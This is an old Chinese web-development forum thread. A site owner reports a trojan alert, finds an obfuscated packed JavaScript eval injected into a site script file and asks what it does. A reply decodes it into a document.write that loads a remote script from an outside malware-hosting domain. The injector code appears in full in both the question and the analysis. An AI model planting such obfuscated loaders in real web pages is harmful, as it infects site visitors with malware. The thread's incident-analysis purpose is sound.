论坛徽章:: 0

电梯直达

1楼 [收藏(0)] [报告]

发表于 2008-11-19 23:31 |只看该作者 |倒序浏览

这两天打开网站，mcafee就弹出提示说有特洛伊。在页面中检查了下没有发现什么可疑的代码。联想到服务器IP网段几天前受到ARP攻击，于是怀疑是ARP挂马。而是我的服务器及网关进行了IP与MAC绑定。找了一个上午没有解决问题，客服还提出给换了个IP，问题仍旧。

下午又仔细地看代码，也没有找到。最后怀疑可能是挂马的代码加在了网页链接的某个js脚本上，终于在一个脚本文件中找到了下面这段代码：

eval(function(m,y,l,o,v,e){v=function(l){return l.toString(36)};if(!''.replace(/^/,String)){while(l--){e[l.toString(y)]=o[l]||l.toString(y)}o=[function(v){return e[v]}];v=function(){return'\\w+'};l=1};while(l--){if(o[l]){m=m.replace(new RegExp('\\b'+v(l)+'\\b','g'),o[l])}}return m}('9.a(\'<3\'+\'4 b="8\'+\'c://\'+\'%6%0\'+\'%1%7\'+\'%5%0\'+\'%g%k\'+\'%d%l\'+\'%j%1\'+\'/e\'+\'i\'+\'f.2\'+\'h\'+\'2"></3\'+\'4>\');',22,22,'61|6E|p|scr|ipt|68|77|67|ht|document|write|src|tp|69|cl|ck|6F|||63|78|2E'.split('|'),0,{}))

去掉后，问题就解决了。但是现在还没年明白这段代码的意思，请高手指点。

文库|博客

ynchnluiti

巨富豪门

论坛徽章:: 3

2楼 [报告]

发表于 2008-11-20 10:41 |只看该作者

我把eval换成alert了，可以放心测试。函数的返回：document.write('<script src="http://wanghaoxi.cn/click.php"></script>');

// eval(
//function(m,22,22,o,0,{})
alert(
function(m,y,l,o,v,e)
{
v=function(l)
{
return l.toString(36)
};
if(!''.replace(/^/,String))
{
while(l--){
//e[l.toString(y)]= o[l] || l.toString(y);
e[l.toString(22)]= o[l] || l.toString(22);
//e[22]=2e;
//e[21]=78;
//e[20]=63;
//e[19]=19;
//e[18]=18;
//e[17]=6F;
}
o=[ function(v) { return e[v] } ];
v=function(){
return'\\w+'
};
l=1
};
while(l--){
if(o[l]){
m=m.replace(new RegExp('\\b'+v(l)+'\\b','g'),o[l])
}
}
//return m
return unescape(m.replace(/'\+'/g, ""));
}
('9.a(\'<3\'+\'4 b="8\'+\'c://\'+\'%6%0\'+\'%1%7\'+\'%5%0\'+\'%g%k\'+\'%d%l\'+\'%j%1\'+\'/e\'+\'i\'+\'f.2\'+\'h\'+\'2"></3\'+\'4>\');',22,22,'61|6E|p|scr|ipt|68|77|67|ht|document|write|src|tp|69|cl|ck|6F|||63|78|2E'.split('|'),0,{}));
//)

复制代码

实战分享：从技术角度谈机器学习入门| 【大话IT】RadonDB低门槛向MySQL集群下战书 | ChinaUnix打赏功能已上线！ | 新一代分布式关系型数据库RadonDB知多少？

返回列表

Chinaunix › 论坛 › 程序设计 › Web开发 › 网站被挂马，请都其js代码的含义

网站被挂马，请都其js代码的含义 [复制链接]

浏览过的版块